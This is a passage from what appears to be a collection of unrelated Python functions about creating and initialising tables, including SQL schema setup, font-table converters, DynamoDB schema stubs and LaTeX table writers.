'max_hourdiff': 0,\n 'max_speed': 0,\n 'has_split': 0,\n },\n }\n\n # the columns which are editable\n TABLE_EDITSET = {\n IMAGE_TABLE: {'reviewed', 'imgnotes', 'gps'},\n ANNOTATION_TABLE: {\n 'name',\n 'species',\n 'annotnotes',\n 'exemplar',\n 'viewpoint',\n 'quality_text',\n 
'age_min',\n 'age_max',\n 'sex_text',\n 'tag_text',\n },\n NAME_TABLE: {'name', 'namenotes'},\n QRES_TABLE: {'name'},\n IMAGESET_TABLE: {\n 'imagesettext',\n 'imageset_shipped_flag',\n 'imageset_processed_flag',\n },\n IMAGE_GRID: set(),\n THUMB_TABLE: set(),\n NAMES_TREE: {\n 'exemplar',\n 'name',\n 'namenotes',\n 'viewpoint',\n 'quality_text',\n 'age_min',\n 'age_max',\n 'sex_text',\n },\n }\n\n if const.SIMPLIFY_INTERFACE:\n TABLE_EDITSET[NAMES_TREE].remove('name')\n\n TABLE_HIDDEN_LIST = {\n # IMAGE_TABLE : [False, True, False, False, False, True, False, False, False, False, False],\n # ANNOTATION_TABLE : [False, False, False, False, False, False, False, True, True, True, True, True, True],\n # NAMES_TREE : [False, False, False, False, False, False],\n # NAME_TABLE : [False, False, False, False],\n }\n\n TABLE_STRIPE_LIST = {\n IMAGE_GRID: 9,\n }\n\n # Define the valid columns a table could have\n COL_DEF = dict(\n [\n ('annot_visual_uuid', (str, 'Annot Visual UUID')),\n ('image_uuid', (str, 'Image UUID')),\n ('gid', (int, 'Image ID')),\n ('aid', (int, 'Annotation ID')),\n ('nid', (int, 'Name ID')),\n ('imgsetid', (int, 'ImageSet ID')),\n ('nAids', (int, '#Annots')),\n ('nExAids', (int, '#Exemplars')),\n ('nGt', (int, '#GT')),\n ('nImgs', (int, '#Imgs')),\n ('nFeats', (int, '#Features')),\n ('quality_text', (str, 'Quality')),\n ('imagesettext_names', (str, 'ImageSet Names')),\n ('age_min', (int, 'Age (min)')),\n ('age_max', (int, 'Age (max)')),\n ('sex_text', (str, 'Sex')),\n ('rank', (str, 'Rank')), # needs to be a string for !Query\n ('unixtime', (float, 'unixtime')),\n ('species', (str, 'Species')),\n ('viewpoint', (str, 'Viewpoint')),\n ('img_gname', (str, 'Image Name')),\n ('annot_gname', (str, 'Source Image')),\n ('gdconf', (str, 'Detection Confidence')),\n ('rdconf', (float, 'Detection Confidence')),\n ('name', (str, 'Name')),\n ('annotnotes', (str, 'Annot Notes')),\n ('namenotes', (str, 'Name Notes')),\n ('imgnotes', (str, 'Image Notes')),\n ('match_name', (str, 'Matching Name')),\n ('bbox', (str, 'BBOX (x, y, w, h))')), # Non editables are safe as strs\n ('num_verts', (int, 'NumVerts')),\n ('verts', (str, 'Verts')),\n ('score', (str, 'Confidence')),\n ('theta', (str, 'Theta')),\n ('reviewed', (bool, 'Detection Reviewed')),\n ('exemplar', (bool, 'Is Exemplar')),\n ('imagesettext', (str, 'ImageSet')),\n ('datetime', (str, 'Date / Time')),\n ('ext', (str, 'EXT')),\n ('thumb', ('PIXMAP', 'Thumb')),\n ('gps', (str, 'GPS')),\n ('orientation', (str, 'Orientation')),\n ('imageset_processed_flag', (bool, 'Processed')),\n ('imageset_shipped_flag', (bool, 'Commited')),\n ('imageset_start_datetime', (str, 'Start Time')),\n ('imageset_end_datetime', (str, 'End Time')),\n ('imageset_duration', (str, 'Duration')),\n ('imageset_notes', (str, 'Notes')),\n ('party_tag', (str, 'Party')),\n ('contributor_tag', (str, 'Contributor')),\n ('percent_imgs_reviewed_str', (str, '%Imgs Reviewed')),\n ('percent_annotmatch_reviewed_str', (str, '%Queried')),\n ('num_imgs_reviewed', (str, '#Imgs Reviewed')),\n ('num_annotmatch_reviewed', (str, '#Matches Reviewed')),\n ('percent_names_with_exemplar_str', (str, '%Names with Exemplar')),\n ('max_speed', (float, 'Max Speed km/h')),\n ('has_split', (float, 'Needs Split')),\n ('max_hourdiff', (float, 'Max Hour Diff')),\n ('tag_text', (str, 'Tags')),\n ]\n )\n\n declare_tup = (\n TABLENAME_LIST,\n TABLE_NICE,\n TABLE_COLNAMES,\n TABLE_TREE_LEVELS,\n TABLE_EDITSET,\n TABLE_HIDDEN_LIST,\n TABLE_STRIPE_LIST,\n COL_DEF,\n )\n return declare_tup", "def 
initialize(self):\n\n cursor = self.conn.cursor()\n\n # This table can be used as a parent for a collection of runs\n cursor.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS RunCollections (\n id INT AUTO_INCREMENT PRIMARY KEY,\n name VARCHAR(14) UNIQUE\n );\"\"\"\n )\n\n # This table holds in which run each appears.\n cursor.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS Runs (\n id INT AUTO_INCREMENT PRIMARY KEY,\n name VARCHAR(14) UNIQUE,\n collection_id INT,\n FOREIGN KEY (collection_id) REFERENCES RunCollections (id) ON DELETE CASCADE);\"\"\"\n )\n\n # This table holds resources, which can be in multiple runs and have multiple varieties\n cursor.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS Resources (\n id INT AUTO_INCREMENT PRIMARY KEY, \n extension VARCHAR(20), \n webpage VARCHAR(30),\n run_id INT NOT NULL,\n FOREIGN KEY (run_id) REFERENCES Runs (id) ON DELETE CASCADE);\"\"\"\n )\n\n cursor.execute(\n 'SELECT Table_name FROM information_schema.tables WHERE table_schema = \"vpntfg0\" AND Table_name LIKE \"%Varieties_%\" ORDER BY Table_name'\n )\n for row in cursor.fetchall():\n self.variety_tables.append(row[0])\n\n cursor.close()\n _logger.info(\"Variety tables are: %s\" % self.variety_tables)\n\n _logger.info(\"Database initialized\")", "def buildConverters(tableSpec, tableNamespace):\n converters = []\n convertersByName = {}\n for tp, name, repeat, aux, descr in tableSpec:\n tableName = name\n if name.startswith(\"ValueFormat\"):\n assert tp == \"uint16\"\n converterClass = ValueFormat\n elif name.endswith(\"Count\") or name in (\"StructLength\", \"MorphType\"):\n converterClass = {\n \"uint8\": ComputedUInt8,\n \"uint16\": ComputedUShort,\n \"uint32\": ComputedULong,\n }[tp]\n elif name == \"SubTable\":\n converterClass = SubTable\n elif name == \"ExtSubTable\":\n converterClass = ExtSubTable\n elif name == \"SubStruct\":\n converterClass = SubStruct\n elif name == \"FeatureParams\":\n converterClass = FeatureParams\n elif name in (\"CIDGlyphMapping\", \"GlyphCIDMapping\"):\n converterClass = StructWithLength\n else:\n if not tp in converterMapping and \"(\" not in tp:\n tableName = tp\n converterClass = Struct\n else:\n converterClass = eval(tp, tableNamespace, converterMapping)\n\n conv = converterClass(name, repeat, aux, description=descr)\n\n if conv.tableClass:\n # A \"template\" such as OffsetTo(AType) knowss the table class already\n tableClass = conv.tableClass\n elif tp in (\"MortChain\", \"MortSubtable\", \"MorxChain\"):\n tableClass = tableNamespace.get(tp)\n else:\n tableClass = tableNamespace.get(tableName)\n\n if not conv.tableClass:\n conv.tableClass = tableClass\n\n if name in [\"SubTable\", \"ExtSubTable\", \"SubStruct\"]:\n conv.lookupTypes = tableNamespace[\"lookupTypes\"]\n # also create reverse mapping\n for t in conv.lookupTypes.values():\n for cls in t.values():\n convertersByName[cls.__name__] = Table(name, repeat, aux, cls)\n if name == \"FeatureParams\":\n conv.featureParamTypes = tableNamespace[\"featureParamTypes\"]\n conv.defaultFeatureParams = tableNamespace[\"FeatureParams\"]\n for cls in conv.featureParamTypes.values():\n convertersByName[cls.__name__] = Table(name, repeat, aux, cls)\n converters.append(conv)\n assert name not in convertersByName, name\n convertersByName[name] = conv\n return converters, convertersByName", "def setup_table(self):\n\n self.setup.create_basic_table_in_dev()\n self.setup.insert_random_records_into_dev()", "def _process(self, tables=None):\n\n if self._tables:\n return self._tables\n\n tables = tables or {}\n\n for row in 
self.url.generator.iter_rp:\n\n table_id_key = row['Table ID'].strip().lower()\n\n if not row['Line Number'].strip():\n if 'Universe' not in row['Table Title']:\n if table_id_key not in tables:\n tables[table_id_key] = Table(row['Table ID'], row['Table Title'].strip().title(),\n seq=row['Sequence Number'],\n startpos=int(row['Start Position']))\n else:\n tables[table_id_key].seq = row['Sequence Number']\n tables[table_id_key].startpos = row['Start Position']\n tables[table_id_key].subject = row['Subject Area']\n\n else:\n tables[table_id_key].universe = row['Table Title'].replace('Universe: ', '').strip()\n\n else: # column row\n try:\n\n line_no = int(row['Line Number'])\n\n if not line_no in tables[table_id_key].columns:\n tables[table_id_key].columns[line_no] = Column(row['Table ID'],\n f\"{row['Table ID']}_{line_no:03}\",\n line_no,\n description=row['Table Title'])\n else:\n tables[table_id_key].columns[line_no].description = row['Table Title']\n\n\n except ValueError as e:\n # Headings, which have fractional line numebrs\n # print(row)\n pass\n\n self._tables = tables\n\n return self._tables", "def testLR0ParseTable(self):\r\n from pydsl.Parser.LR0 import _slr_build_parser_table, build_states_sets\r\n state_sets = build_states_sets(productionset0)\r\n self.assertEqual(len(state_sets), 5)\r\n #0 . EI: : . exp $ , \r\n # exp : .SR\r\n # transitions: S -> 2,\r\n # goto: exp -> 1\r\n #1 EI: exp . $ ,\r\n # transitions: $ -> 3\r\n #2 exp: S . R,\r\n # transitions: R -> 4\r\n #3 EI: exp $ .\r\n #4 exp: S R .\r\n # reduce\r\n\r\n parsetable = _slr_build_parser_table(productionset0)\r\n self.assertEqual(len(parsetable), 4)", "def init_tables(self) -> None:\n # TODO(#93) maybe raise flag when the schema of existing tables isn't what we expect\n # it to be?\n # \"How to know that schema changes?\"\n # logger.warning(\"some message\")\n with self.table_access_condition:\n conn = self._get_connection()\n conn.execute(\"PRAGMA foreign_keys = 1\")\n with conn:\n c = conn.cursor()\n c.execute(CREATE_PROJECTS_TABLE)\n c.execute(CREATE_TASKS_TABLE)\n c.execute(CREATE_REQUESTERS_TABLE)\n c.execute(CREATE_TASK_RUNS_TABLE)\n c.execute(CREATE_ASSIGNMENTS_TABLE)\n c.execute(CREATE_UNITS_TABLE)\n c.execute(CREATE_WORKERS_TABLE)\n c.execute(CREATE_AGENTS_TABLE)\n c.execute(CREATE_QUALIFICATIONS_TABLE)\n c.execute(CREATE_GRANTED_QUALIFICATIONS_TABLE)\n c.execute(CREATE_ONBOARDING_AGENTS_TABLE)", "def pre_interface_route_table_create(self, resource_dict):\n pass", "def _init_table(self, table: \"Table\"):\n if not self.columns:\n self.columns = table.columns\n self._data = table.data", "def __init__(self, *args):\n _snap.TTable_swiginit(self, _snap.new_TTable(*args))", "def generate_inicialization_file(id_test,lines,columns):\n \n def _generate_cell_initialization(outputFile,inputLine,fieldNames):\n print(\"_generate_cell_initialization\")\n outputFile.write(\"\\n\")\n outputFile.write(\"rule : { \\n\")\n port_idx =0\n for fieldName in fieldNames[1:]:\n port_idx=port_idx+1\n print(\"Writing \"+str(fieldName+\" for agent \"+str(inputLine[0])))\n outputFile.write(\"\\t\\t~\"+str(fieldName)+\"\\t\\t:= \"+str(inputLine[port_idx].strip())+\";\\n\")\n \n outputFile.write(\" } \\n\")\n outputFile.write(\" 0 \\n\")\n outputFile.write(\" { \\n\")\n outputFile.write(\"\\t\\t(0,0)~\"+fieldNames[1]+\"\\t = -\"+ \\\n str(inputLine[0])+\"\\n\")\n #str(DEFAULT_INITIAL_CELL_VALUE))\n outputFile.write(\" } \\n\")\n #outputFile.write()\n \n \n print(\"generate_inicialization_file\")\n 
initialization_output_file_name=\"inicializacion.inc\"\n initialization_input_file_name=id_test+\"_initialization.csv\"\n f_output = io.open(INPUT_PARSER_RESULTS_DIR+initialization_output_file_name, \"w\",newline='\\n')\n f_input = io.open(AGRODEVS_INPUT_DIR+initialization_input_file_name, \"r\")\n \n input_reader = csv.reader(f_input, delimiter=',')\n field_names_list = next(input_reader)\n if (field_names_list[0]!=\"agent\"):\n print(\"First field of inicialization input file should be 'agent' but is:\"+field_names_list[0])\n print(\"Cannot generate inicialization file for AgroDevs\")\n return\n else:\n print(field_names_list)\n #Write macro header line\n f_output.write(\"#BeginMacro(inicializar) \\n\")\n \n for line in input_reader:\n if (line[0]==\"default\"):\n #generate default cell initialization\n print(\"generating default cell initialization\")\n else:\n #generate agent cell initialization\n #print(\"generate agent cell initialization\")\n _generate_cell_initialization(f_output,line,field_names_list)\n \n f_output.write(\"#EndMacro \\n\") \n f_input.close()\n f_output.close()", "def init_tables(self) -> None:\n with self.table_access_condition:\n conn = self._get_connection()\n conn.execute(\"PRAGMA foreign_keys = 1\")\n c = conn.cursor()\n c.execute(tables.CREATE_STUDIES_TABLE)\n c.execute(tables.CREATE_SUBMISSIONS_TABLE)\n c.execute(tables.CREATE_REQUESTERS_TABLE)\n c.execute(tables.CREATE_UNITS_TABLE)\n c.execute(tables.CREATE_WORKERS_TABLE)\n c.execute(tables.CREATE_RUNS_TABLE)\n c.execute(tables.CREATE_RUN_MAP_TABLE)\n c.execute(tables.CREATE_PARTICIPANT_GROUPS_TABLE)\n c.execute(tables.CREATE_PARTICIPANT_GROUP_QUALIFICATIONS_MAPPING_TABLE)\n conn.commit()", "def __init__(self, spec, decl=None):\n self._spec = []\n self.initialize()\n self._processDecl(decl)\n self._processSpec(spec)", "def init_rib_tables(self):\n cur = self.sql.cursor()\n cur.execute(\"PRAGMA foreign_keys = on\")\n cur.execute('''\n CREATE TABLE rtr_cache (\n rtr_id INTEGER PRIMARY KEY NOT NULL,\n device TEXT NOT NULL,\n rtrupdt INTEGER,\n UNIQUE (device))''')\n cur.execute('''\n CREATE TABLE rtr_rib (\n rtr_id INTEGER NOT NULL\n REFERENCES rtr_cache(rtr_id)\n ON DELETE CASCADE\n ON UPDATE CASCADE,\n idx INTEGER NOT NULL,\n status TEXT,\n pfx TEXT NOT NULL,\n pfxlen INTEGER NOT NULL,\n pfxstr_min TEXT NOT NULL,\n pfxstr_max TEXT NOT NULL,\n nexthop TEXT NOT NULL,\n metric INTEGER,\n locpref INTEGER,\n weight INTEGER,\n pathbutone TEXT,\n orig_asn INTEGER NOT NULL,\n route_orig TEXT)''')\n self.sql.commit()", "def _create_intermediate_new_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY LIST 
(operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._blocking_conditions_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n cond_name TEXT NOT NULL,\n reason TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._mnc_mcc_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n mcc_mnc_pattern TEXT NOT NULL,\n operator_id TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._notifications_imei_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_triplets_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n fallback_operators TEXT[]\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._pairings_imei_imsi_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY RANGE (virt_imei_shard) \"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True, fillfactor=45)\n table_names.append(tblname)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def __init__(\n self,\n tableCollection: str,\n activation: str,\n eigenTimeConst: str = \"\",\n expansionTimeConstant: str = \"\",\n ):\n pass", "def test_create_table(self):\n self.assertEqual(\n ['CREATE', 'TABLE', 'T1', '(\\nc1 ENUM(\"a\", \"b\", \"c\"), c2 SET(\"0\", \"1\", \"2\")\\n)'],\n grammar._CREATE_TABLE.parseString(\n 'CREATE TABLE IF NOT EXISTS `T1`(\\nc1 ENUM(\"a\", \"b\", \"c\"), c2 SET(\"0\", \"1\", \"2\")\\n);'\n ).asList()\n )", "def _create_TableDescriptor(self):\n\n self.conn.cursor.execute(\"PRAGMA table_info(\" + self.table_name + \")\")\n 
descriptions = self.conn.cursor.fetchall()\n column_map = {}\n for description in descriptions:\n column_map[description[1]] = description[2]\n td = TD(self.table_name, column_map) \n\n# self.conn.cursor.execute(\"SELECT sql FROM sqlite_master WHERE name='{tb}'\"\\\n# .format(tb=self.table_name))\n# aa = str(self.conn.cursor.fetchone()[0])\n# sindx = aa.find(\"(\")\n# eindx = aa.find(\")\")\n# aa = aa[sindx+1:eindx]\n# aa = aa.split(\",\")\n# column_map = {kyval.split()[0]:kyval.split()[1] for kyval in aa}\n# td = TD(self.table_name, column_map) \n\n return td", "def init_table(row_num):\n # Initialize the number of rows in table\n table = []\n for i in range(row_num):\n row = []\n table.append(row)\n\n # Append the default first cell to the table\n table[0].append(\"Curreny Type\")\n\n return table", "def _db_init_data_tables(self):\n\n #\n # TESTTYPE table\n #\n return self._db_execute(\n \"\"\"\n create table TESTTYPE (\n KEY text unique,\n VALUE text\n )\n \"\"\"\n )", "def defineTABLESECTION(f,layernamelist):\r\n \r\n layercolordict={}\r\n for layername in layernamelist:\r\n t=random.randint(10,17)\r\n layercolordict[layername]=random.randrange(10+t,240+t,10)\r\n \r\n layercolordict[\"Outline\"]=1\r\n layercolordict[\"Mark\"]=5\r\n layercolordict[\"Cutline\"]=2\r\n \r\n f.write(\"0\\nSECTION\\n2\\nTABLES\\n0\\nTABLE\\n2\\nLAYER\\n70\\n2\\n\") \r\n for layername in layernamelist:\r\n f.write(\"0\\nLAYER\\n2\\n\"+layername+\"\\n70\\n0\\n62\\n\"+str(layercolordict[layername])+\"\\n6\\nCONTINUOUS\\n\")\r\n f.write(\"0\\nENDTAB\\n0\\nENDSEC\\n\")", "def make_tables(\n table_cfgs: \"list[tuple[BitPos, BitPos, OffsetType]]\", entries\n) -> \"list[Table]\":\n tables = []\n entry_groups = [entries]\n for (low_bit, cap_bit, offset_type) in table_cfgs:\n table = Table(entry_groups, low_bit, cap_bit, offset_type)\n entry_groups = map(lambda bucket: bucket.entries(), table.buckets())\n tables.append(table)\n return tables", "def read_descriptions(args):\n\n table_list = check_output(\n 'echo \"show tables %s;\" | tql' % args.database, shell=True\n ).split(\n \"\\n\"\n )\n for table in table_list:\n table_details = table.split(\"|\")\n if len(table_details) >= 2:\n schema_name = table_details[0].strip()\n table_name = table_details[1].strip()\n\n schema = descriptions.get(schema_name, None)\n if schema is None:\n schema = {}\n\n table = schema.get(table_name, None)\n if table is None:\n table = {}\n\n column_list = check_output(\n 'echo \"show table %s.%s.%s;\" | tql'\n % (args.database, schema_name, table_name),\n shell=True,\n ).split(\n \"\\n\"\n )\n for column in column_list:\n column_details = column.split(\"|\")\n if len(column_details) >= 2:\n column_name = column_details[0].strip()\n column_type = column_details[2].strip()\n table[column_name] = column_type\n\n schema[table_name] = table\n descriptions[schema_name] = schema", "def prep(self):\n sq1 = 'create table TCVR ( ID, T, C, V, R , primary key ( ID ) ) ;'\n sq2 = 'create table IDX ( ID , A , primary key(A) ) ; '\n self.sq.SQX(sq1)\n self.sq.SQX(sq2)\n sq3 = \"insert into IDX VALUES ( 1 , 'A' ) ; \"\n self.sq.SQX(sq3)", "def visit_table(self, node: docutils.nodes.reference) -> None:\n self.entry = {}\n self.header = {}", "def _initialize(self):\n query_table = self._cursor.execute(f\"\"\"\n SELECT name\n FROM sqlite_master\n WHERE type='table' AND name='{self._table_name}';\"\"\")\n\n if not query_table.fetchone():\n self._cursor.execute(f\"\"\"\n CREATE TABLE {self._table_name} (\n id char(36),\n term TEXT,\n timestamp BIGINT\n 
);\"\"\")\n\n self._cursor.execute(f\"\"\"\n CREATE INDEX index_timestamp\n ON {self._table_name} (timestamp);\"\"\")\n\n self._conn.commit()", "def setup(self):\n self.table = prettytable.PrettyTable()\n self.table.field_names = self.titles\n if self.convert_columns:\n self.rows = self.convert_columns_to_rows(self.rows)\n if self.colour:\n self.colour = self.convert_columns_to_rows(self.colour)", "def generate_table(self, rows):\n ...", "def pre_route_table_create(self, resource_dict):\n pass", "def _add_table_schema(table_desc, table_name, schema):\n table_desc['TableName'] = table_name\n table_desc['AttributeDefinitions'] = [{\n 'AttributeName': item['name'],\n 'AttributeType': DynamoStubber._encode_type(item['type'])\n } for item in schema]\n table_desc['KeySchema'] = [{\n 'AttributeName': item['name'],\n 'KeyType': item['key_type']\n } for item in schema]", "def table_fields() -> Dict[str, TableFieldDetails]:\n return {\n \"REPEATS\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=0,\n bit_high=15,\n description=\"Number of times the line will repeat\",\n labels=None,\n ),\n \"TRIGGER\": TableFieldDetails(\n subtype=\"enum\",\n bit_low=16,\n bit_high=19,\n description=\"The trigger condition to start the phases\",\n labels=[\n \"Immediate\",\n \"BITA=0\",\n \"BITA=1\",\n \"BITB=0\",\n \"BITB=1\",\n \"BITC=0\",\n \"BITC=1\",\n \"POSA>=POSITION\",\n \"POSA<=POSITION\",\n \"POSB>=POSITION\",\n \"POSB<=POSITION\",\n \"POSC>=POSITION\",\n \"POSC<=POSITION\",\n ],\n ),\n \"POSITION\": TableFieldDetails(\n subtype=\"int\",\n bit_low=32,\n bit_high=63,\n description=\"The position that can be used in trigger condition\",\n labels=None,\n ),\n \"TIME1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=64,\n bit_high=95,\n description=\"The time the optional phase 1 should take\",\n labels=None,\n ),\n \"OUTA1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=20,\n bit_high=20,\n description=\"Output A value during phase 1\",\n labels=None,\n ),\n \"OUTB1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=21,\n bit_high=21,\n description=\"Output B value during phase 1\",\n labels=None,\n ),\n \"OUTC1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=22,\n bit_high=22,\n description=\"Output C value during phase 1\",\n labels=None,\n ),\n \"OUTD1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=23,\n bit_high=23,\n description=\"Output D value during phase 1\",\n labels=None,\n ),\n \"OUTE1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=24,\n bit_high=24,\n description=\"Output E value during phase 1\",\n labels=None,\n ),\n \"OUTF1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=25,\n bit_high=25,\n description=\"Output F value during phase 1\",\n labels=None,\n ),\n \"TIME2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=96,\n bit_high=127,\n description=\"The time the mandatory phase 2 should take\",\n labels=None,\n ),\n \"OUTA2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=26,\n bit_high=26,\n description=\"Output A value during phase 2\",\n labels=None,\n ),\n \"OUTB2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=27,\n bit_high=27,\n description=\"Output B value during phase 2\",\n labels=None,\n ),\n \"OUTC2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=28,\n bit_high=28,\n description=\"Output C value during phase 2\",\n labels=None,\n ),\n \"OUTD2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=29,\n bit_high=29,\n description=\"Output D value during phase 2\",\n labels=None,\n ),\n \"OUTE2\": TableFieldDetails(\n subtype=\"uint\",\n 
bit_low=30,\n bit_high=30,\n description=\"Output E value during phase 2\",\n labels=None,\n ),\n \"OUTF2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=31,\n bit_high=31,\n description=\"Output F value during phase 2\",\n labels=None,\n ),\n }", "def setup_latex_table(self, tabletype, injected):\n self.texfile.write(r\"\\\\renewcommand{\\\\arraystretch}{1.6}\\n\")\n self.texfile.write(r\"\\n\")\n self.texfile.write(r\"\\\\begin{table}[t!]\\n\")\n self.texfile.write(r\" \\\\begin{center}\\n\")\n if tabletype == 'fiducial_fit_params':\n if injected:\n nextline = r\" \\\\begin{tabu} to 1.0\\\\textwidth \"\n nextline += r\"{| X[2.0,c] | X[1,c] | X[1,c] | X[1,c]\"\n nextline += r\" | X[1,c] | X[1,c] | X[1,c] | X[1,c] |}\\n\"\n self.texfile.write(nextline)\n self.texfile.write(r\" \\hline\\n\")\n nextline = r\" \\multirow{2}{*}{\\\\textbf{Parameter}} \"\n nextline += r\"& \\multirow{2}{*}{\\\\textbf{Inj}} \"\n nextline += r\"& \\multicolumn{3}{c|}{h0} \"\n nextline += r\"& \\multicolumn{3}{c|}{h1} \"\n nextline += r\"\\\\\\\\ \\cline{3-8}\"\n self.texfile.write(nextline)\n nextline = r\" & & Prior & Fit & \\(\\Delta\\) \"\n nextline += r\"& Prior & Fit & \\(\\Delta\\) \\\\\\\\ \\hline\\n\"\n self.texfile.write(nextline)\n else:\n nextline = r\" \\\\begin{tabu} to 1.0\\\\textwidth \"\n nextline += r\"{| X[c] | X[c] | X[c] |}\\n\"\n self.texfile.write(nextline)\n self.texfile.write(r\" \\hline\\n\")\n self.texfile.write(r\" Parameter & h0 & h1 \\\\\\\\ \\hline\\n\")\n elif tabletype == 'fiducial_fit_metrics':\n nextline = r\" \\\\begin{tabu} to 1.0\\\\textwidth \"\n nextline += r\"{| X[c] | X[c] | X[c] |}\\n\"\n self.texfile.write(nextline)\n self.texfile.write(r\" \\hline\\n\")\n self.texfile.write(r\" h0 & h1 & $\\Delta$ \\\\\\\\ \\hline\\n\")\n else:\n raise ValueError(\n \"This function is only for making fit metric or fit \"\n \"param tables in LaTeX. 
Got type %s\"%tabletype\n )", "def init_blank(self, T):\n self.headings = []\n self.table = {}\n self.rowcount = 0\n for e in T.entries:\n self.headings.append(e.name)\n self.table[e.name] = []", "def _table_step(self, op: data_algebra.data_ops_types.OperatorPlatform, *, data_map: Dict[str, Any]):\n if op.node_name != \"TableDescription\":\n raise TypeError(\n \"op was supposed to be a data_algebra.data_ops.TableDescription\"\n )\n res = data_map[op.table_name]\n if not self.is_appropriate_data_instance(res):\n raise ValueError(\n \"data_map[\" + op.table_name + \"] was not the right type\"\n )\n if self.use_lazy_eval and (not isinstance(res, pl.LazyFrame)):\n res = res.lazy()\n res = res.select(op.columns_produced())\n return res", "def prepare_for_table(data, machine_id):\n\n defint = lambda x: 0 if x == '' else int(x)\n\n keep_and_convert = {\n 'MESSAGE': str,\n 'PRIORITY': defint,\n '__REALTIME_TIMESTAMP': defint,\n '_PID': defint,\n '_UID': defint,\n '_SYSTEMD_UNIT': str,\n 'SYSLOG_IDENTIFIER': str,\n '_COMM': str,\n }\n result = dict((key, converter(data.get(key, ''))) for key, converter in keep_and_convert.items())\n result['MACHINE_ID'] = machine_id\n return data['__CURSOR'], result", "def from_description(cls, desc):\n table = desc['Table']\n throughput = table['ProvisionedThroughput']\n attrs = {}\n for data in table.get('AttributeDefinitions', []):\n field = TableField(data['AttributeName'],\n TYPES_REV[data['AttributeType']])\n attrs[field.name] = field\n for data in table.get('KeySchema', []):\n name = data['AttributeName']\n attrs[name].key_type = data['KeyType']\n for index in 